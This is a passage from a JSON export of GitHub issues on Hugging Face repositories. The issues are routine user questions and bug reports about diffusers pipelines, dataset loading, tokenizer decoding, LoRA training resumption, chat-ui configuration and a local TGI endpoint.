StableDiffusionSafetyChecker.from_pretrained(\"CompVis/stable-diffusion-safety-checker\"),\r\n).to(\"cuda\")\r\npipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)\r\nresult = pipe(\r\n prompt=\"1girl\",\r\n)\r\n```\r\n\r\n### Logs\r\n\r\nI got the following error\r\n\r\n```shell\r\n\r\nKeyword arguments {'safety_checker': StableDiffusionSafetyChecker(\r\n (vision_model): CLIPVisionModel(\r\n (vision_model): CLIPVisionTransformer(\r\n (embeddings): CLIPVisionEmbeddings(\r\n (patch_embedding): Conv2d(3, 1024, kernel_size=(14, 14), stride=(14, 14), bias=False)\r\n (position_embedding): Embedding(257, 1024)\r\n )\r\n (pre_layrnorm): LayerNorm((1024,), eps=1e-05, elementwise_affine=True)\r\n (encoder): CLIPEncoder(\r\n (layers): ModuleList(\r\n (0-23): 24 x CLIPEncoderLayer(\r\n (self_attn): CLIPAttention(\r\n (k_proj): Linear(in_features=1024, out_features=1024, bias=True)\r\n (v_proj): Linear(in_features=1024, out_features=1024, bias=True)\r\n (q_proj): Linear(in_features=1024, out_features=1024, bias=True)\r\n (out_proj): Linear(in_features=1024, out_features=1024, bias=True)\r\n )\r\n (layer_norm1): LayerNorm((1024,), eps=1e-05, elementwise_affine=True)\r\n (mlp): CLIPMLP(\r\n (activation_fn): QuickGELUActivation()\r\n (fc1): Linear(in_features=1024, out_features=4096, bias=True)\r\n (fc2): Linear(in_features=4096, out_features=1024, bias=True)\r\n )\r\n (layer_norm2): LayerNorm((1024,), eps=1e-05, elementwise_affine=True)\r\n )\r\n )\r\n )\r\n (post_layernorm): LayerNorm((1024,), eps=1e-05, elementwise_affine=True)\r\n )\r\n )\r\n (visual_projection): Linear(in_features=1024, out_features=768, bias=False)\r\n)} are not expected by StableDiffusionXLPipeline and will be ignored.\r\n```\r\n\r\n\r\n### System Info\r\n\r\n- `diffusers` version: 0.20.0\r\n- Platform: Linux-5.4.0-148-generic-x86_64-with-glibc2.31\r\n- Python version: 3.10.6\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Huggingface_hub version: 0.17.3\r\n- Transformers version: 4.34.0\r\n- Accelerate version: 0.23.0\r\n- xFormers version: 0.0.22\r\n- Using GPU in script?: yes\r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @sayakpaul @DN6 @patrickvonplaten\r\n\r\nthanks for your kind help", "url": "https://github.com/huggingface/diffusers/issues/5372", "state": "closed", "labels": [ "bug" ], "created_at": "2023-10-12T03:39:23Z", "updated_at": "2023-10-12T08:13:28Z", "user": "hundredwz" }, { "repo": "huggingface/transformers.js", "number": 354, "title": 
"[Question] Whisper Progress", "body": "Is it possible to obtain the transcription progress of Whisper's model, ranging from 0 to 100%?", "url": "https://github.com/huggingface/transformers.js/issues/354", "state": "open", "labels": [ "question" ], "created_at": "2023-10-11T20:41:01Z", "updated_at": "2025-05-23T10:12:13Z", "user": "FelippeChemello" }, { "repo": "huggingface/text-generation-inference", "number": 1131, "title": "How to send a request with system, user and assistant prompt?", "body": "How to send in a request prompt(system, user or assistant) like chatgpt where we can specify to out of 3 categories, does the prompt belong?", "url": "https://github.com/huggingface/text-generation-inference/issues/1131", "state": "closed", "labels": [ "Stale" ], "created_at": "2023-10-11T09:21:14Z", "updated_at": "2024-01-10T17:26:12Z", "user": "ShRajSh" }, { "repo": "huggingface/dataset-viewer", "number": 1962, "title": "Install dependency `music_tag`?", "body": "Requested here: https://huggingface.co/datasets/zeio/baneks-speech/discussions/1", "url": "https://github.com/huggingface/dataset-viewer/issues/1962", "state": "closed", "labels": [ "question", "custom package install", "P2" ], "created_at": "2023-10-11T08:07:53Z", "updated_at": "2024-02-02T17:18:50Z", "user": "severo" }, { "repo": "huggingface/datasets", "number": 6292, "title": "how to load the image of dtype float32 or float64", "body": "_FEATURES = datasets.Features(\r\n {\r\n \"image\": datasets.Image(),\r\n \"text\": datasets.Value(\"string\"),\r\n },\r\n)\r\nThe datasets builder seems only support the unit8 data. How to load the float dtype data? ", "url": "https://github.com/huggingface/datasets/issues/6292", "state": "open", "labels": [], "created_at": "2023-10-11T07:27:16Z", "updated_at": "2023-10-11T13:19:11Z", "user": "wanglaofei" }, { "repo": "huggingface/optimum", "number": 1442, "title": "Steps to quantize Llama 2 models for CPU inference", "body": "Team,\r\n\r\ncould you please share the steps to quantize the Llama 2 models for CPU inference.\r\nWhen i followed the ORTModelForCasualLM, faced challenges stating token is 401 forbidden even though token passed.\r\nFor offline model faced issue something related to cannot load from local directory.\r\n\r\nPlease share steps.", "url": "https://github.com/huggingface/optimum/issues/1442", "state": "open", "labels": [ "question", "quantization" ], "created_at": "2023-10-11T05:32:58Z", "updated_at": "2024-10-15T16:19:59Z", "user": "eswarthammana" }, { "repo": "huggingface/dataset-viewer", "number": 1956, "title": "upgrade hfh to 0.18.0?", "body": "https://github.com/huggingface/huggingface_hub/releases/tag/v0.18.0", "url": "https://github.com/huggingface/dataset-viewer/issues/1956", "state": "closed", "labels": [ "question", "blocked-by-upstream", "dependencies", "P2" ], "created_at": "2023-10-10T12:33:04Z", "updated_at": "2023-11-16T11:47:04Z", "user": "severo" }, { "repo": "huggingface/diffusers", "number": 5353, "title": "How to use FreeU in SimpleCrossAttnUpBlock2D?", "body": "I've tried to change your code in order to maintain SimpleCrossAttnUpBlock2D however it seems that shapes doesn't fit up. How can I do it? Thanks! 
\r\n \r\n```Traceback (most recent call last):\r\n File \"/usr/local/lib/python3.9/dist-packages/gradio/routes.py\", line 523, in run_predict\r\n output = await app.get_blocks().process_api(\r\n File \"/usr/local/lib/python3.9/dist-packages/gradio/blocks.py\", line 1437, in process_api\r\n result = await self.call_function(\r\n File \"/usr/local/lib/python3.9/dist-packages/gradio/blocks.py\", line 1109, in call_function\r\n prediction = await anyio.to_thread.run_sync(\r\n File \"/usr/local/lib/python3.9/dist-packages/anyio/to_thread.py\", line 33, in run_sync\r\n return await get_asynclib().run_sync_in_worker_thread(\r\n File \"/usr/local/lib/python3.9/dist-packages/anyio/_backends/_asyncio.py\", line 877, in run_sync_in_worker_thread\r\n return await future\r\n File \"/usr/local/lib/python3.9/dist-packages/anyio/_backends/_asyncio.py\", line 807, in run\r\n result = context.run(func, *args)\r\n File \"/usr/local/lib/python3.9/dist-packages/gradio/utils.py\", line 865, in wrapper\r\n response = f(*args, **kwargs)\r\n File \"/home/ubuntu/mimesis-ml-gan-backend/app.py\", line 128, in generate\r\n image = pipe(image=input_image,\r\n File \"/usr/lib/python3.9/site-packages/torch/utils/_contextlib.py\", line 115, in decorate_context\r\n return func(*args, **kwargs)\r\n File \"/home/ubuntu/mimesis-ml-gan-backend/src/diffusions/kandinsky/pipeline_kandinsky_img2img_scheduler.py\", line 125, in __call__\r\n noise_pred = self.unet(\r\n File \"/usr/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/usr/lib/python3.9/site-packages/diffusers/models/unet_2d_condition.py\", line 1020, in forward\r\n sample = upsample_block(\r\n File \"/usr/lib/python3.9/site-packages/torch/nn/modules/module.py\", line 1501, in _call_impl\r\n return forward_call(*args, **kwargs)\r\n File \"/home/ubuntu/mimesis-ml-gan-backend/free_lunch_utils.py\", line 166, in forward\r\n hidden_states = torch.cat([hidden_states, res_hidden_states], dim=1)\r\nRuntimeError: Tensors must have same number of dimensions: got 3 and 4 ```\r\n", "url": "https://github.com/huggingface/diffusers/issues/5353", "state": "closed", "labels": [], "created_at": "2023-10-10T09:13:22Z", "updated_at": "2023-10-11T05:11:38Z", "user": "americanexplorer13" }, { "repo": "huggingface/computer-vision-course", "number": 25, "title": "Should we use safetensors?", "body": "I wondered if we should add an official recommendation to use the `safetensors` saving format wherever possible.\r\n\r\nBut I have to admit, that I'm not that familiar with it, so I don't know how much overhead it would be in cases where we cannot use a HF library like `transformers`.", "url": "https://github.com/huggingface/computer-vision-course/issues/25", "state": "closed", "labels": [ "question" ], "created_at": "2023-10-09T19:38:39Z", "updated_at": "2023-10-11T20:50:32Z", "user": "johko" }, { "repo": "huggingface/tokenizers", "number": 1362, "title": "When decoding an English sentence with the 'add_prefix_space' parameter set to 'False,' how can I add spaces?", "body": "I train a tokenizer and set 'add_prefix_space' to 'False', How can I ensure that BBPE tokenizers correctly handle space division when decoding a sequence ?\r\n```\r\nnormalizer = normalizers.Sequence([NFC(), StripAccents()])\r\ntokenizer.normalizer = normalizer\r\ntokenizer.pre_tokenizer = pre_tokenizers.Sequence(\r\n [Whitespace(), Punctuation(), Digits(individual_digits=True), UnicodeScripts(),\r\n ByteLevel(add_prefix_space=False, 
use_regex=True), ])\r\ntokenizer.decoder = decoders.ByteLevel(add_prefix_space=False, use_regex=True)\r\ntokenizer.post_processor = tokenizers.processors.ByteLevel()\r\n```\r\n", "url": "https://github.com/huggingface/tokenizers/issues/1362", "state": "closed", "labels": [], "created_at": "2023-10-09T16:19:43Z", "updated_at": "2023-10-30T14:25:24Z", "user": "enze5088" }, { "repo": "huggingface/dataset-viewer", "number": 1952, "title": "filter parameter should accept any character?", "body": "https://datasets-server.huggingface.co/filter?dataset=polinaeterna/delays_nans&config=default&split=train&where=string_col=\u0439\u043e\u043f\u0442\u0430&offset=0&limit=100\r\n\r\ngives an error\r\n\r\n```\r\n{\"error\":\"Parameter 'where' is invalid\"}\r\n```", "url": "https://github.com/huggingface/dataset-viewer/issues/1952", "state": "closed", "labels": [ "bug", "question", "P1" ], "created_at": "2023-10-09T13:59:20Z", "updated_at": "2023-10-09T17:26:15Z", "user": "severo" }, { "repo": "huggingface/chat-ui", "number": 495, "title": "Make the description customizable in the .env", "body": "I'd like to customize the description of chat-ui as marked below. But I can't find how to do it in your tutorial, README.md.\r\nIt would be highly appreciated if you assist.\r\n\r\n![image](https://github.com/huggingface/chat-ui/assets/142883089/046d3926-ddef-4da8-87a7-8771db218976)\r\n", "url": "https://github.com/huggingface/chat-ui/issues/495", "state": "closed", "labels": [ "enhancement", "good first issue", "front", "hacktoberfest" ], "created_at": "2023-10-09T13:57:32Z", "updated_at": "2023-10-13T13:49:47Z", "comments": 7, "user": "sjbpsh" }, { "repo": "huggingface/datasets", "number": 6287, "title": "map() not recognizing \"text\"", "body": "### Describe the bug\n\nThe [map() documentation](https://huggingface.co/docs/datasets/v2.14.5/en/package_reference/main_classes#datasets.Dataset.map) reads:\r\n`\r\nds = ds.map(lambda x: tokenizer(x['text'], truncation=True, padding=True), batched=True)`\r\n\r\nI have been trying to reproduce it in my code as:\r\n\r\n`tokenizedDataset = dataset.map(lambda x: tokenizer(x['text']), batched=True)`\r\n\r\nBut it doesn't work as it throws the error:\r\n\r\n> KeyError: 'text'\r\n\r\nCan you please guide me on how to fix it?\r\n\r\n\n\n### Steps to reproduce the bug\n\n1. `from datasets import load_dataset\r\n\r\ndataset = load_dataset(\"amazon_reviews_multi\")`\r\n\r\n2. Then this code: `from transformers import AutoTokenizer\r\n\r\ntokenizer = AutoTokenizer.from_pretrained(\"bert-base-cased\")`\r\n3. The line I quoted above (which I have been trying)\n\n### Expected behavior\n\nAs mentioned in the documentation, it should run without any error and map the tokenization on the whole dataset.\n\n### Environment info\n\nPython 3.10.2", "url": "https://github.com/huggingface/datasets/issues/6287", "state": "closed", "labels": [], "created_at": "2023-10-09T10:27:30Z", "updated_at": "2023-10-11T20:28:45Z", "comments": 1, "user": "EngineerKhan" }, { "repo": "huggingface/diffusers", "number": 5337, "title": "What is the function of `callback` in stable diffusion?", "body": "I am reading the source code for stable diffusion pipeline. I wonder what is the function of `callback`? How to use it? 
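For concreteness, this is my current guess at the usage, based on the signature (a sketch; `pipe` is a loaded StableDiffusionPipeline):

```python
def on_step(step: int, timestep: int, latents) -> None:
    # invoked every `callback_steps` denoising steps with the current latents
    print(f"step={step} timestep={timestep} latents={tuple(latents.shape)}")

image = pipe("a photo of an astronaut", callback=on_step, callback_steps=1).images[0]
```
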
Is there an example?\r\n\r\nhttps://github.com/huggingface/diffusers/blob/29f15673ed5c14e4843d7c837890910207f72129/src/diffusers/pipelines/stable_diffusion/pipeline_stable_diffusion.py#L585C13-L585C21", "url": "https://github.com/huggingface/diffusers/issues/5337", "state": "closed", "labels": [ "stale" ], "created_at": "2023-10-09T06:02:13Z", "updated_at": "2023-11-16T15:05:20Z", "user": "g-jing" }, { "repo": "huggingface/open-muse", "number": 122, "title": "How to finetune the muse-512?", "body": "Thank you for your contributions to the open-source community. After testing your weights, we found that the fine-tuned muse-512 has made significant improvements in image quality. We are very interested in this and would like to know how you performed the fine-tuning on the model. For example, what dataset did you use for fine-tuning? Is it open-source? What are its characteristics? Once again, we appreciate your contributions to the open-source community.", "url": "https://github.com/huggingface/open-muse/issues/122", "state": "open", "labels": [], "created_at": "2023-10-09T05:00:54Z", "updated_at": "2023-10-09T05:00:54Z", "user": "jiaxiangc" }, { "repo": "huggingface/diffusers", "number": 5335, "title": "How to deploy locally, as the Chinese government has blocked huggingface?", "body": "### Describe the bug\n\nI have all the model ckpt/safetensor files, but it still tries to connect to /CompVis/stable-diffusion/main/configs/stable-diffusion/v1-infer\n\n### Reproduction\n\npipe = diffusers.StableDiffusionPipeline.from_single_file(base_model,\r\n torch_dtype=torch.float16,\r\n use_safetensors=True,\r\n safety_checker=None,)\n\n### Logs\n\n_No response_\n\n### System Info\n\nPlatform: Win10\r\nPython version: 3.10.11\r\nPyTorch version (GPU?): 2.0.1+cu118\r\ndiffusers version: 0.16.1\r\nTransformers version: 4.26.0\r\nAccelerate version: 0.15.0\r\nxFormers version: not installed\r\nUsing GPU in script?: 3070\r\nUsing distributed or parallel set-up in script?: No\n\n### Who can help?\n\n@yiyixuxu @DN6 @patrickvonplaten @sayakpaul", "url": "https://github.com/huggingface/diffusers/issues/5335", "state": "closed", "labels": [ "bug", "stale" ], "created_at": "2023-10-09T01:55:44Z", "updated_at": "2024-01-17T10:44:31Z", "user": "Louis24" }, { "repo": "huggingface/chat-ui", "number": 485, "title": "chat-ui and TGI Connect Timeout Error", "body": "Hi, I used TGI as a backend for llama2. When I put the TGI endpoint in chat-ui, it cannot connect, even though TGI and chat-ui are on the same machine. Would you give me some suggestions? 
thank you!\r\n\r\nTGI work well.\r\n```shell\r\ncurl http://127.0.0.1:8081/generate_stream \\\r\n -X POST \\\r\n -d '{\"inputs\":\"What is Deep Learning?\",\"parameters\":{\"max_new_tokens\":20}}' \\\r\n -H 'Content-Type: application/json'\r\n \r\ndata:{\"token\":{\"id\":13,\"text\":\"\\n\",\"logprob\":-0.45239258,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":13,\"text\":\"\\n\",\"logprob\":-0.5541992,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":2772,\"text\":\"De\",\"logprob\":-0.016738892,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":1022,\"text\":\"ep\",\"logprob\":-0.000002503395,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":6509,\"text\":\" learning\",\"logprob\":-0.026168823,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":30081,\"text\":\" \",\"logprob\":-0.08898926,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":29898,\"text\":\"(\",\"logprob\":-0.0023441315,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":15189,\"text\":\"also\",\"logprob\":-0.0006175041,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":2998,\"text\":\" known\",\"logprob\":-0.000029087067,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":408,\"text\":\" as\",\"logprob\":-7.1525574e-7,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":30081,\"text\":\" \",\"logprob\":-0.0052261353,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":24535,\"text\":\"deep\",\"logprob\":-0.0019664764,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":2281,\"text\":\" struct\",\"logprob\":-0.0007429123,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":2955,\"text\":\"ured\",\"logprob\":-0.000027537346,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":6509,\"text\":\" learning\",\"logprob\":-0.000081300735,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":29897,\"text\":\")\",\"logprob\":-0.00006067753,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":338,\"text\":\" is\",\"logprob\":-0.00009846687,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":760,\"text\":\" part\",\"logprob\":-0.000022292137,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":310,\"text\":\" of\",\"logprob\":-3.5762787e-7,\"special\":false},\"generated_text\":null,\"details\":null}\r\n\r\ndata:{\"token\":{\"id\":263,\"text\":\" a\",\"logprob\":-0.00013446808,\"special\":false},\"generated_text\":\"\\n\\nDeep learning (also known as deep structured learning) is part of a\",\"details\":null} \r\n```\r\n\r\nchat-ui **.env.local** MODELS config:\r\n\r\n```shell\r\nMODELS=`[\r\n{\r\n \"name\": \"Trelis/Llama-2-7b-chat-hf-function-calling\",\r\n \"datasetName\": \"Trelis/function_calling_extended\",\r\n \"description\": \"function calling Llama-7B-chat\",\r\n \"websiteUrl\": \"https://research.Trelis.com\",\r\n \"userMessageToken\": \"\",\r\n \"userMessageEndToken\": \" [/INST] \",\r\n \"assistantMessageToken\": 
\"\",\r\n \"assistantMessageEndToken\": \" [INST] \",\r\n \"chatPromptTemplate\" : \"[INST] <>\\nRespond in French to all questions\\n<>\\n\\n{{#each messages}}{{#ifUser}}{{content}} [/INST] {{/ifUser}}{{#ifAssistant}}{{content}} [INST] {{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.01,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024\r\n },\r\n \"endpoints\": [{\r\n \"url\": \"http://127.0.0.1:8081/generate_stream\"\r\n }]\r\n }\r\n]` \r\n```\r\n\r\nerror message:\r\n\r\n```shell\r\n[vite] Error when evaluating SSR module /src/lib/server/websearch/sentenceSimilarity.ts:\r\n|- TypeError: fetch failed\r\n at fetch (/root/chat-ui/node_modules/undici/index.js:109:13)\r\n at processTicksAndRejections (node:internal/process/task_queues:95:5)\r\n at runNextTicks (node:internal/process/task_queues:64:3)\r\n at process.processImmediate (node:internal/timers:447:9)\r\n at async getModelFile (file:///root/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:468:24)\r\n at async getModelJSON (file:///root/chat-ui/node_modules/@xenova/transformers/src/utils/hub.js:542:18)\r\n at async Promise.all (index 0)\r\n at async loadTokenizer (file:///root/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:56:16)\r\n at async AutoTokenizer.from_pretrained (file:///root/chat-ui/node_modules/@xenova/transformers/src/tokenizers.js:3778:48)\r\n at async Promise.all (index 0)\r\n\r\n2:32:29 PM [vite] Error when evaluating SSR module /src/lib/server/websearch/runWebSearch.", "url": "https://github.com/huggingface/chat-ui/issues/485", "state": "closed", "labels": [ "support" ], "created_at": "2023-10-08T06:36:26Z", "updated_at": "2025-01-16T23:13:34Z", "comments": 8, "user": "ViokingTung" }, { "repo": "huggingface/transformers", "number": 26665, "title": "How to resume training from a checkpoint when training LoRA using deepspeed\uff1f", "body": "### System Info\n\n- `transformers` version: 4.34.0.dev0\r\n- Platform: Linux-5.4.143.bsk.7-amd64-x86_64-with-glibc2.28\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.16.4\r\n- Safetensors version: 0.3.2\r\n- Accelerate version: 0.21.0\r\n- Accelerate config: - compute_environment: LOCAL_MACHINE\r\n - distributed_type: DEEPSPEED\r\n - use_cpu: False\r\n - num_processes: 1\r\n - machine_rank: 0\r\n - num_machines: 1\r\n - rdzv_backend: static\r\n - same_network: True\r\n - main_training_function: main\r\n - deepspeed_config: {'deepspeed_config_file': 'none', 'zero3_init_flag': False}\r\n - downcast_bf16: no\r\n - tpu_use_cluster: False\r\n - tpu_use_sudo: False\r\n - tpu_env: []\r\n - dynamo_config: {'dynamo_backend': 'INDUCTOR', 'dynamo_mode': 'default', 'dynamo_use_dynamic': False, 'dynamo_use_fullgraph': False}\r\n- PyTorch version (GPU?): 2.0.1+cu117 (True)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \n\n### Who can help?\n\n@pacman100 @ArthurZucker @younesbelkada\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nWhen using deepspeed to train LoRA, I want to use the resume function of the trainer. 
The sample code is as follows:\r\n```python\r\ncausal_model = AutoModelForCausalLM.from_pretrained(model_pretrained_path_,\r\n config=config,\r\n trust_remote_code=True,\r\n low_cpu_mem_usage=self.params[\"low_cpu_mem_usage\"])\r\n\r\npeft = PEFT(config_path_or_data=peft_params)\r\ncausal_model = peft.get_peft_model(model=causal_model)\r\n\r\ntrainer = Seq2SeqTrainer(\r\n params=trainer_params,\r\n model=causal_model,\r\n tokenizer=tokenizer,\r\n train_dataset=train_dataset,\r\n data_collator=data_collator,\r\n eval_dataset=eval_dataset,\r\n compute_metrics=dataset_t.metric,\r\n )\r\n\r\ntrainer.train(resume_from_checkpoint=True)\r\n```\r\nThe deepspeed config is as follows:\r\n```json\r\n{\r\n \"fp16\": {\r\n \"enabled\": \"auto\",\r\n \"loss_scale\": 0,\r\n \"loss_scale_window\": 1000,\r\n \"initial_scale_power\": 16,\r\n \"hysteresis\": 2,\r\n \"min_loss_scale\": 1\r\n },\r\n \"bf16\": {\r\n \"enabled\": \"auto\"\r\n },\r\n \"zero_optimization\": {\r\n \"stage\": 2,\r\n \"cpu_offload\": false,\r\n \"allgather_partitions\": true,\r\n \"allgather_bucket_size\": 5e8,\r\n \"overlap_comm\": true,\r\n \"reduce_scatter\": true,\r\n \"reduce_bucket_size\": 5e8,\r\n \"contiguous_gradients\": true\r\n },\r\n \"gradient_accumulation_steps\": \"auto\",\r\n \"gradient_clipping\": \"auto\",\r\n \"steps_per_print\": 50,\r\n \"train_batch_size\": \"auto\",\r\n \"train_micro_batch_size_per_gpu\": \"auto\",\r\n \"wall_clock_breakdown\": false\r\n}\r\n```\r\n\n\n### Expected behavior\n\nRuntimeError: Expected all tensors to be on the same device, but found at least two devices, cuda:0 and cpu! (when checking argument for argument state_steps in method wrapper_CUDA___fused_adamw_)", "url": "https://github.com/huggingface/transformers/issues/26665", "state": "closed", "labels": [], "created_at": "2023-10-08T03:51:00Z", "updated_at": "2024-01-06T08:06:06Z", "user": "Sakurakdx" }, { "repo": "huggingface/chat-ui", "number": 484, "title": "Rich text input for the chat bar?", "body": "Taking a nifty feature from the Claude API here: models on HuggingChat, and most models used with Chat UI, can process or fluently speak markdown. \r\n\r\nIt's pretty easy to take something like remarkable and turn rich text, like titles, bolds and lists, into markdown. \r\nIt's helpful for users to organize content, to be able to highlight things, or put items in lists.\r\n\r\nHoping for a feature like this.", "url": "https://github.com/huggingface/chat-ui/issues/484", "state": "open", "labels": [ "enhancement", "front" ], "created_at": "2023-10-07T19:25:45Z", "updated_at": "2023-10-09T00:20:09Z", "comments": 2, "user": "VatsaDev" }, { "repo": "huggingface/chat-ui", "number": 480, "title": "Porting through nginx on aws", "body": "I have this up and running with aws but it only works on localhost on my machine. How can I use Nginx to expose this at some address?", "url": "https://github.com/huggingface/chat-ui/issues/480", "state": "open", "labels": [ "support" ], "created_at": "2023-10-06T10:39:52Z", "updated_at": "2023-10-08T21:13:10Z", "comments": 0, "user": "Mr-Nobody1" }, { "repo": "huggingface/sentence-transformers", "number": 2330, "title": "How to make prediction in NLI", "body": "I can't make predictions for the NLI task when running the training_NLI example file. 
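For comparison, I know a pretrained cross-encoder can produce NLI predictions directly, e.g. (a sketch; the model name and label order are taken from its model card):

```python
from sentence_transformers import CrossEncoder

model = CrossEncoder("cross-encoder/nli-deberta-v3-base")
scores = model.predict([("A man is eating food.", "A man is eating.")])
labels = ["contradiction", "entailment", "neutral"]  # per the model card
print(labels[scores[0].argmax()])  # expected: entailment
```

What I can't figure out is how to get the same kind of prediction out of the softmax head that training_NLI trains. 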
Can you help me?", "url": "https://github.com/huggingface/sentence-transformers/issues/2330", "state": "closed", "labels": [], "created_at": "2023-10-06T08:52:59Z", "updated_at": "2024-01-31T16:18:18Z", "user": "trthminh" }, { "repo": "huggingface/candle", "number": 1036, "title": "How to fine-tune large models?", "body": "Hello all,\r\n\r\nHow should I finetune a large model? Are there implementations like `peft` in Python for Candle? Specifically, how should I train a quantized, LoRA model? I saw [candle-lora](https://github.com/EricLBuehler/candle-lora), and plan to use that but do not know how to quantize a large model.", "url": "https://github.com/huggingface/candle/issues/1036", "state": "closed", "labels": [], "created_at": "2023-10-05T16:43:17Z", "updated_at": "2024-12-03T15:55:53Z", "user": "nullptr2nullptr" }, { "repo": "huggingface/trl", "number": 837, "title": "What is the loss mask for special tokens in SFFTrainer", "body": "### System Info\n\nlatest transformers\n\n### Who can help?\n\n@muellerzr and @pacman100\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nI'm training with SFTTrainer and want to ensure that the model is including the loss on predicting an EOS token (< /s >).\r\n\r\nWhat is the default handling of special tokens for the loss computation in SFTTrainer? Can I change this?\r\n```\r\nfrom transformers import Trainer\r\nfrom trl import SFTTrainer\r\n\r\ntrainer = SFTTrainer(\r\n peft_config=config,\r\n dataset_text_field=\"text\",\r\n max_seq_length=context_length,\r\n tokenizer=tokenizer,\r\n model=model,\r\n train_dataset=data[\"train\"],\r\n eval_dataset=data[\"test\"],\r\n args=transformers.TrainingArguments(\r\n max_steps=60, # comment this out after the first time you run. This is for testing!\r\n num_train_epochs=epochs,\r\n output_dir=save_dir,\r\n evaluation_strategy=\"steps\",\r\n do_eval=True,\r\n per_device_train_batch_size=batch_size,\r\n gradient_accumulation_steps=4,\r\n per_device_eval_batch_size=batch_size,\r\n log_level=\"debug\",\r\n optim=\"paged_adamw_8bit\",\r\n save_steps=0.2,\r\n logging_steps=1,\r\n learning_rate=1e-4,\r\n eval_steps=0.2,\r\n fp16=True,\r\n max_grad_norm=0.3,\r\n warmup_ratio=0.03,\r\n lr_scheduler_type=\"linear\",\r\n ),\r\n callbacks=[logging_callback], # Add custom callback here\r\n)\r\nmodel.config.use_cache = False # silence the warnings. 
Please re-enable for inference!\r\ntrainer.train()\r\n```\r\nNote that in my dataset I have included EOS tokens where appropriate\n\n### Expected behavior\n\nThe output of my fine-tuning is not emitting EOS tokens, which leads me to believe that the loss mask is zero for special tokens with SFTTrainer, but I'm unsure if that's true.", "url": "https://github.com/huggingface/trl/issues/837", "state": "closed", "labels": [], "created_at": "2023-10-05T13:49:52Z", "updated_at": "2023-11-13T18:23:54Z", "user": "RonanKMcGovern" }, { "repo": "huggingface/chat-ui", "number": 476, "title": "Chat-ui failing on Edge, Chrome and Safari.", "body": "It seems to be working on Firefox for mac and Safari for iOS.\r\n\r\n\r\nStacktrace in console from Chrome:\r\n```\r\nFailed to load resource: the server responded with a status of 404 ()\r\nUrlDependency.4e6706f5.js:1 Failed to load resource: the server responded with a status of 404 ()\r\nstores.6bc4a41f.js:1 Failed to load resource: the server responded with a status of 404 ()\r\nchat.danskgpt.dk/:1 Uncaught (in promise) TypeError: Failed to fetch dynamically imported module: https://chat.danskgpt.dk/_app/immutable/entry/start.59a3223b.js\r\n_layout.svelte.e4398851.js:1 Failed to load resource: the server responded with a status of 404 ()\r\n_page.svelte.e0b7a273.js:1 Failed to load resource: the server responded with a status of 404 ()\r\nLoginModal.fe5c7c4d.js:1 Failed to load resource: the server responded with a status of 404 ()\r\napp.1a92c8bc.js:1 Failed to load resource: the server responded with a status of 404 ()\r\nwww.danskgpt.dk/chatui/favicon.png:1 Failed to load resource: the server responded with a status of 404 ()\r\n_error.svelte.00b004c8.js:1 Failed to load resource: the server responded with a status of 404 ()\r\nwww.danskgpt.dk/chatui/favicon.svg:1 Failed to load resource: the server responded with a status of 404 ()\r\n```\r\n\r\nIt's hosted at [here](https://chat.danskgpt.dk).\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/476", "state": "closed", "labels": [ "support" ], "created_at": "2023-10-05T13:03:01Z", "updated_at": "2023-10-05T13:56:49Z", "comments": 4, "user": "mhenrichsen" }, { "repo": "huggingface/dataset-viewer", "number": 1929, "title": "Add a \"feature\" or \"column\" level for better granularity", "body": "For example, if we support statistics for a new type of columns, or if we change the way we compute some stats, I think that we don't want to recompute the stats for all the columns, just for one of them.\r\n\r\nIt's a guess, because maybe it's more efficient to have one job that downloads the data and computes every possible stats, than having N jobs that download the same data and compute only one stat. To be evaluated", "url": 